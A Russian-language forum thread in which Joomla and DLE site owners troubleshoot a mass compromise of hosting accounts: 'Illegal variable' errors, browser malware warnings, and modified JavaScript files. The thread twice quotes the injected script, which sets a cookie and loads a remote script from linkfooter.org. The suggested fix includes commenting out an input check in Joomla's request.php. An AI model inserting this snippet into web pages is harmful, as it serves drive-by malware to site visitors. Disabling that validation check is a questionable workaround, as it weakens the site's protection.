Легло более 10 сайтов - Illegal variable _files or _env or _get or _post or _cookie or _ser - Joomla 1.5: Общие вопросы

Помогите, уважающие форумчане, легло более 10 сайтов на Joomla 1.5, расположенных на разных серверах одного хостинга - ошибка
"Illegal variable _files or _env or _get or _post or _cookie or _server or _session or globals passed to script."

Если делать хак с фалом request.php, то перестает работать админка и многие модули (походу перестают работать жаба скрипты jQuery и jQuery.ajax)

Помогите - три дня на смарку прошло, уже клиенты звонят и мозг выносят !

может на сервере версию php подняли?

говорят что нет! И что должно все лечь? установили и то не на все сервера mod_secyrity

Яндекс вебмастер сообщил недавно о вирусах drive-by-download на сайтах причем даже не только на джумловских, но и на обычном HTML +жаба...

Яндекс вебмастер сообщил недавно о вирусах drive-by-download на сайтах причем даже не только на джумловских, но и на обычном HTML +жаба...

Ссылку?
И о какой жабе речь?

Ссылку?И о какой жабе речь?

жаба Lightbox (дата изменения сегодня), все js изменены на всех сайтах сегодня, ? взлом? - нет более ! более 10 акаунтов  сразными паролями

взлом хостинга?

function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<script src="http://linkfooter.org/linkfooter.js"></script>');} дописано....

жаба Lightbox (дата изменения сегодня), все js изменены на всех сайтах сегодня, ? взлом? - нет более ! более 10 акаунтов  сразными паролями

Это не жаба, и даже не ява, а JavaScript.
Уязвимость в нем? Или тупо своровали пароли?
Думаю что последнее.

а другие хостинги?

Все таки ломали походу Joomla с другого форума:
"5 декабря 2012 Коллеги, при попытке зайти на сайт появляется надпись Illegal variable _files or _env or _get or _post or _cookie or _server or _session or globals passed to script. что сие значит?" - http://forum.astrakhan.ru/index.php?s=6e4ff5482acd4e2cc82cf6066ab8d60b&showtopic=123113&pid=2361883&st=0&
Остается узнать, что за уязвимость и на каких серверах и настройках...

Ага, и у меня такая же фигня.
IE и Mozilla нормально заходит, Opera говорит "Страница была замечена в распространении вредоносного программного обеспечения", Chrome выдает "Illegal variable _files or _env or _get or _post or _cookie or _server or _session or globals passed to script."

Хостер тоже говорит что атака была, восстановили из бекапа но безрезультатно.

Есть предположения как можно наладить?

очередная бессонная ночь - с хостером определили, что ломанули акаунт (вернее 14 аков - нужно было по шифрованному FTP (ftps) работать с сайтами), поэтому поменяли пароли сначала... Потом восстановили из бекапа (трех дневной давности), поменял пароли к доступу и после этого уже и сделал хак...

В файле request.php
libraries/joomla/environment/request.php
Строку:$failed |= is_numeric( $key );Закоментить


заработало

У меня тоже самое, хостинг на агаве, правда сайт на DLE, во всех *.js файлов дописано в конце function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<script src="http://linkfooter.org/linkfooter.js"></script>');}
Массово удалил, щас заливаю обратно. Не знаю поможет или нет.